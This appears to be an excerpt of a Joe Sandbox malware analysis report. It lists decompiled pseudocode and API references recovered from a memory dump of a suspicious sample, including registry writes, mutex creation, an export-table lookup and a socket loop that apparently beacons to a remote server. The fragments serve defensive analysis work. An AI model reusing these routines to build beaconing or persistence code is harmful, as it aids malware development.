0x01042549
0x00000000

APIs

RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,76B30770,?,?,0104270B,?,?), ref: 01042534

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f1b339dcd86b21e4a4b074e56ce93df6794402e89946523daa88afb0d83effa6
Instruction ID: 21b6d61ab1d459a49e953845e8bd49b51ec08e4b9709be3aea6a7211243256f8
Opcode Fuzzy Hash: f1b339dcd86b21e4a4b074e56ce93df6794402e89946523daa88afb0d83effa6
Instruction Fuzzy Hash: FAE0D876511215FFDB30CA529D48FCB7E6DDB057E4F008154F50A92051C2B18640D6F0

Uniqueness

Uniqueness Score: -1.00%

Function 010332E6 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010332E6(struct _EXCEPTION_RECORD* __ecx, WCHAR** __edx, void* __eflags) {
				short _v1028;
				struct _EXCEPTION_RECORD* _t14;
				WCHAR** _t15;

				_t15 = __edx;
				_t14 = __ecx;
				E01031052( &_v1028, 0, 0x400);
				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
				E010336F7(_t14,  &_v1028); // executed
				return _t14;
			}

0x010332ff
0x01033301
0x01033303
0x01033319
0x01033328
0x01033332

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 01033319

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlen$DispatcherEnvironmentExceptionExpandStringsUser
String ID:
API String ID: 1216311190-0
Opcode ID: dce86599868b3a9edd5651e93d4215557ce13b484be637913686e624238c740d
Instruction ID: 59d66ebc5ceb1e5e6c7c10635b5f36d54f398494438458d7a278d98bc495c097
Opcode Fuzzy Hash: dce86599868b3a9edd5651e93d4215557ce13b484be637913686e624238c740d
Instruction Fuzzy Hash: ADE0D8F670015967DB30A6159C05FD6776DEBC4308F0400B5B748F21C0E9B5D906CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01033447 Relevance: 1.5, APIs: 1, Instructions: 25
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01033447(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
				void* _t4;
				WCHAR* _t6;
				WCHAR** _t8;
				WCHAR** _t14;

				_t14 = _a4;
				_t8 = __ecx;
				_t4 = E01033373(_t14);
				_t6 = E01035F8C( *((intOrPtr*)(__ecx)), 4 + (_t4 + E01033373(__ecx)) * 2); // executed
				 *_t8 = _t6;
				return lstrcatW(_t6,  *_t14);
			}

0x0103344d
0x01033450
0x01033454
0x0103346d
0x01033472
0x01033481

APIs

Part of subcall function 01033373: lstrlenW.KERNEL32(76B30770,01033758,?,?,?,01042AE3,0104566F,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,0104563F,00000000,76B30770,00000000), ref: 0103337A

lstrcatW.KERNEL32(00000000,76B30770), ref: 01033477

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 046a6c77b505dc871ac2b0558f69b85fc581cd0f9f9b09071ae49329c82de46a
Instruction ID: 45b5cd158e6e69c61a08b3ad34b4780763026bed0e51e27aeb781779c8070621
Opcode Fuzzy Hash: 046a6c77b505dc871ac2b0558f69b85fc581cd0f9f9b09071ae49329c82de46a
Instruction Fuzzy Hash: 08E04FB26042145BCB116B65E8C49AEBB9EFFD62A07044536E9868B320EE755C1086E5

Uniqueness

Uniqueness Score: -1.00%

Function 01035A23 Relevance: 1.5, APIs: 1, Instructions: 23
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01035A23(void* __ecx, void* __eflags) {

				E010332D5(__ecx);
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				E010417B7(__ecx + 0x1d8, __ecx);
				__imp__#115(2, __ecx + 0x38); // executed
				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				return __ecx;
			}

0x01035a27
0x01035a2e
0x01035a31
0x01035a3b
0x01035a3e
0x01035a41
0x01035a4c
0x01035a52
0x01035a58
0x01035a5b
0x01035a60

APIs

Part of subcall function 010417B7: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,010413FD,?,?,01041978,?,76B30770,00000000,01035B72), ref: 010417BF

WSAStartup.WS2_32(00000002,?), ref: 01035A4C

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CreateMutexStartup
String ID:
API String ID: 3730780901-0
Opcode ID: e68a059cbadf82545ee71aa45603ddcff86175c3d0a96cc0f8b7198afea7bc3b
Instruction ID: e66dd289a53deff9f795bb919ff90a822b72a61ef576dc0c7b7df3b0f1a53432
Opcode Fuzzy Hash: e68a059cbadf82545ee71aa45603ddcff86175c3d0a96cc0f8b7198afea7bc3b
Instruction Fuzzy Hash: 72E0C9B5501B108BC270AF2A9985997FBF8FFE46217405A1FD4E682AA0C7B0B5498B50

Uniqueness

Uniqueness Score: -1.00%

Function 010412C4 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010412C4(intOrPtr* __ecx, CHAR** _a4) {
				intOrPtr* _t10;

				_t10 = __ecx;
				E01033237(__ecx + 4, _a4); // executed
				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
				return 1;
			}

0x010412cc
0x010412d1
0x010412e5
0x010412ed

APIs

Part of subcall function 01033237: lstrcatA.KERNEL32(00000000,76B30770,?,00000000,?,010336D6,00000000,00000000,?,01034FB1,?,?,?,?,?,00000000), ref: 01033263

CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 010412DF

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CreateEventlstrcat
String ID:
API String ID: 2275612694-0
Opcode ID: 59036e8e35fc9332e4bc6096d9a55141083b8f2e08f919afc4ae3c77b888c4ff
Instruction ID: dd5a4fe7bb621b4f32f2421623be2877e643f7bf481e5a7584ef5870787ed704
Opcode Fuzzy Hash: 59036e8e35fc9332e4bc6096d9a55141083b8f2e08f919afc4ae3c77b888c4ff
Instruction Fuzzy Hash: 6CD05E762446067BD710AAA5DD46F96BF69FBA1770F004022F69986580DBB2A020CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 010417B7 Relevance: 1.5, APIs: 1, Instructions: 15
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010417B7(void** __ecx) {
				void* _t5;
				void** _t10;

				_t10 = __ecx;
				_t5 = CreateMutexA(0, 0, 0); // executed
				 *_t10 = _t5;
				_t10[1] = 0 | _t5 != 0xffffffff;
				return _t10;
			}

0x010417ba
0x010417bf
0x010417c7
0x010417d1
0x010417d5

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,010413FD,?,?,01041978,?,76B30770,00000000,01035B72), ref: 010417BF

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 177f0914c7420ce3e0d3378643691de8b4303296c3a5b9e6068697779598f89c
Instruction ID: d423b10b2f12b79e543a5f1e8f4b78fa071b52ff21e4a4f2746a190ee9c94ef5
Opcode Fuzzy Hash: 177f0914c7420ce3e0d3378643691de8b4303296c3a5b9e6068697779598f89c
Instruction Fuzzy Hash: F7D012F15015205FA3249F3D5C4886775DDDF98730315CE29B4A5C71D4E6308C808760

Uniqueness

Uniqueness Score: -1.00%

Function 01042554 Relevance: 1.5, APIs: 1, Instructions: 9
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01042554(void** __ecx) {
				long _t1;
				signed int* _t3;

				_t3 = __ecx;
				if( *__ecx != 0) {
					_t1 = RegCloseKey( *__ecx); // executed
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t1;
			}

0x01042555
0x0104255a
0x0104255e
0x0104255e
0x01042564
0x01042568

APIs

RegCloseKey.KERNEL32(?,?,010426D3,?,?,0104577A), ref: 0104255E

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f410fc3158653cd9f4e0fe6447e175cc6d1fe2d254ba37d05b56c845dc07dcb0
Instruction ID: 6cd609fd285e8fb9846ad4aad56bf096136356068298a54fb4342c0c352cf69a
Opcode Fuzzy Hash: f410fc3158653cd9f4e0fe6447e175cc6d1fe2d254ba37d05b56c845dc07dcb0
Instruction Fuzzy Hash: 94C0487A021221DBE77A5F28F448794BBE4AB00322F2508AEA0C1550A8A7BA08D0CB84

Uniqueness

Uniqueness Score: -1.00%

Function 01040C3E Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SHCreateDirectoryExW.SHELL32(00000000,?,00000000,0104274C,00000000,?,?,?,?,00000000,76B30770,00000000), ref: 01040C44

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 619f3666a61b4bf163c59bf62ed463d852475a62fbb1cc56cde304abcd8435ff
Instruction ID: 03721ea621c0cf78678871fc7eb7f536557b08a1daeeea9475802efc680d87a0
Opcode Fuzzy Hash: 619f3666a61b4bf163c59bf62ed463d852475a62fbb1cc56cde304abcd8435ff
Instruction Fuzzy Hash: 02B012703E42005BDE201AB08E06F103510A702B07F200560B152C90D4C75200055600

Uniqueness

Uniqueness Score: -1.00%

Function 01041E88 Relevance: 1.3, APIs: 1, Instructions: 49
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E01041E88(void* __ecx, CHAR* __edx, void* __eflags) {
				CHAR* _v8;
				char _v12;
				void* _t20;
				intOrPtr _t22;
				int _t25;
				void* _t31;
				void* _t38;
				signed int _t41;

				_push(__ecx);
				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_t41 = 0;
				_t31 = __ecx;
				_t38 = E01041B6D(__ecx, __eflags, 0,  &_v12);
				if(_t38 == 0) {
					L4:
					_t20 = 0;
				} else {
					_t22 =  *((intOrPtr*)(_t38 + 0x20)) + __ecx;
					_v12 = _t22;
					if( *((intOrPtr*)(_t38 + 0x18)) <= 0) {
						goto L4;
					} else {
						while(1) {
							_t25 = lstrcmpA( *((intOrPtr*)(_t22 + _t41 * 4)) + _t31, _v8); // executed
							if(_t25 == 0) {
								break;
							}
							_t22 = _v12;
							_t41 = _t41 + 1;
							if(_t41 <  *((intOrPtr*)(_t38 + 0x18))) {
								continue;
							} else {
								goto L4;
							}
							goto L5;
						}
						_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x1c)) + _t31 + ( *( *((intOrPtr*)(_t38 + 0x24)) + _t41 * 2 + _t31) & 0x0000ffff) * 4)) + _t31;
					}
				}
				L5:
				return _t20;
			}

0x01041e8b
0x01041e8c
0x01041e90
0x01041e94
0x01041e98
0x01041e9a
0x01041ea2
0x01041ea9
0x01041ed4
0x01041ed4
0x01041eab
0x01041eae
0x01041eb0
0x01041eb6
0x00000000
0x01041eb8
0x01041eb8
0x01041ec1
0x01041ec9
0x00000000
0x00000000
0x01041ecb
0x01041ece
0x01041ed2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01041ed2
0x01041eed
0x01041eed
0x01041eb6
0x01041ed6
0x01041eda

APIs

lstrcmpA.KERNEL32(?,01043251,?,open,01043251), ref: 01041EC1

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: e1fb70c62eeeea781af35cbb7b94e08182382dde9c06e79f004cec33b277373c
Instruction ID: aaef3f96183d135b95cac964c06e50c4225fa94f83e402c5ab0aa2bbd01c731f
Opcode Fuzzy Hash: e1fb70c62eeeea781af35cbb7b94e08182382dde9c06e79f004cec33b277373c
Instruction Fuzzy Hash: 99015AB6A00519AFD721CF9AD8C19AABBF8FF44304B040179E581D3601E730FD95CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01034F74 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01034F74(void* __ecx, void* __edx, void* __eflags) {
				signed int _v12;
				signed int _v20;
				void* _t18;
				short** _t20;
				void* _t22;
				void* _t24;
				void* _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t37;
				void* _t38;

				_t38 = __eflags;
				_t33 = __edx;
				_t34 = __ecx;
				 *((intOrPtr*)(__ecx + 0x244)) = 1;
				_t35 = __ecx + 0x1e4;
				do {
					_t26 = _t35;
					_t18 = E01035DB3(_t35,  &_v20); // executed
					_t20 = E01035DB3(_t35,  &_v12); // executed
					E01033666(_t20, _t37); // executed
					_t22 = E0103594B(_t34 + 4, _t38, _t26,  *((intOrPtr*)(_t18 + 4))); // executed
					E01035FEB(_v12);
					_v12 = _v12 & 0x00000000;
					_t24 = E01035FEB(_v20);
					_v20 = _v20 & 0x00000000;
					_t39 = _t22;
					if(_t22 != 0) {
						_t24 = E0103577F(_t34 + 4, _t33, _t39, _t34); // executed
					}
					Sleep( *(_t34 + 0x210)); // executed
					_t35 = _t34 + 0x1e4;
				} while ( *((intOrPtr*)(_t34 + 0x244)) != 0);
				return _t24;
			}

0x01034f74
0x01034f74
0x01034f7d
0x01034f7f
0x01034f89
0x01034f8f
0x01034f92
0x01034f95
0x01034fa5
0x01034fac
0x01034fb4
0x01034fbe
0x01034fc6
0x01034fca
0x01034fcf
0x01034fd3
0x01034fd5
0x01034fdb
0x01034fdb
0x01034fe6
0x01034ff3
0x01034ff3
0x01034fff

APIs

Part of subcall function 01033666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,01034FB1,?), ref: 01033693
Part of subcall function 01033666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,01034FB1,?,?,?,?,?,00000000), ref: 010336BE

Part of subcall function 0103594B: getaddrinfo.WS2_32(76B30770,00000000,01034FB9,00000000), ref: 01035998
Part of subcall function 0103594B: socket.WS2_32(00000002,00000001,00000000), ref: 010359AF
Part of subcall function 0103594B: htons.WS2_32(00000000), ref: 010359D5
Part of subcall function 0103594B: freeaddrinfo.WS2_32(00000000), ref: 010359E5
Part of subcall function 0103594B: connect.WS2_32(?,?,00000010), ref: 010359F1

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Sleep.KERNEL32(?,?,?,?,?,?,00000000,76B30770,00000000), ref: 01034FE6

Part of subcall function 0103577F: setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 010357B6
Part of subcall function 0103577F: recv.WS2_32(000000FF,?,0000000C,00000000), ref: 01035806
Part of subcall function 0103577F: recv.WS2_32(000000FF,?,000000FF,00000000), ref: 01035876

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWiderecv$FreeSleepVirtualconnectfreeaddrinfogetaddrinfohtonssetsockoptsocket
String ID:
API String ID: 3250391716-0
Opcode ID: 9ec7abf43715ab195965b5d91738c10ae258533ca1cdb3d4481f933fd134ef61
Instruction ID: ede632bb72021542b899c07dab37884253265f920fadf47c688219fc02cf355b
Opcode Fuzzy Hash: 9ec7abf43715ab195965b5d91738c10ae258533ca1cdb3d4481f933fd134ef61
Instruction Fuzzy Hash: 5A018C71A00516AFCB14AB64DD49BEEF7ADBB90315F000118D45AA7160DB706915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01035F68 Relevance: 1.3, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01035F68(long __ecx) {
				void* _t1;
				long _t7;
				void* _t8;

				_t7 = __ecx;
				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				_t8 = _t1;
				E01036077(_t8, _t7);
				return _t8;
			}

0x01035f71
0x01035f76
0x01035f7c
0x01035f81
0x01035f8b

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,010334F4,?,01035B8D,.bss,00000000), ref: 01035F76

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 595466359a984278a56e8951904584a1f400b317cf89f8555a88afceaf3a7eed
Instruction ID: 85474f0b35375e80d35f852f97a05e85dcbbe737f056c164eba6bb2c48632eb6
Opcode Fuzzy Hash: 595466359a984278a56e8951904584a1f400b317cf89f8555a88afceaf3a7eed
Instruction Fuzzy Hash: 9EC012763452603BE134111A7C1EF5B996CCBD1EB1F01001AF6008A2D0DAD11D0181A4

Uniqueness

Uniqueness Score: -1.00%

Function 01039733 Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01039733(void* __eax, void* __ecx) {
				int _t3;
				void* _t5;

				_t5 =  *(__ecx + 0x10);
				if(_t5 != 0) {
					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
					return _t3;
				} else {
					return __eax;
				}
			}

0x01039733
0x01039738
0x01035ff3
0x01035ff9
0x0103973e
0x0103973e
0x0103973e

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: dc7140675c900e8c23e2faf9087a3ae70a6af82047ea35166225168b3f251b72
Instruction ID: bd4197f65062b7905765891a0281a0f3630d244ca6f6514d4252affd1e97df37
Opcode Fuzzy Hash: dc7140675c900e8c23e2faf9087a3ae70a6af82047ea35166225168b3f251b72
Instruction Fuzzy Hash: B1B092783813005BEE7CDB208E96F293254BB80B05FA0498CB1829A0E18A6AE0018A04

Uniqueness

Uniqueness Score: -1.00%

Function 01035FFA Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01035FFA(long __ecx) {
				void* _t1;

				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				return _t1;
			}

0x01036004
0x0103600a

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,01033764,?,?,?,01042AE3,0104566F,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,0104563F,00000000,76B30770,00000000), ref: 01036004

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c462031fec8a48901e2fea7ca121abec6c142f7b6fd436378f6863bb32f04fec
Instruction ID: f1d998c0ce41f68f87a1553629ac791895ef32b72c794f25badecd801e15c4d0
Opcode Fuzzy Hash: c462031fec8a48901e2fea7ca121abec6c142f7b6fd436378f6863bb32f04fec
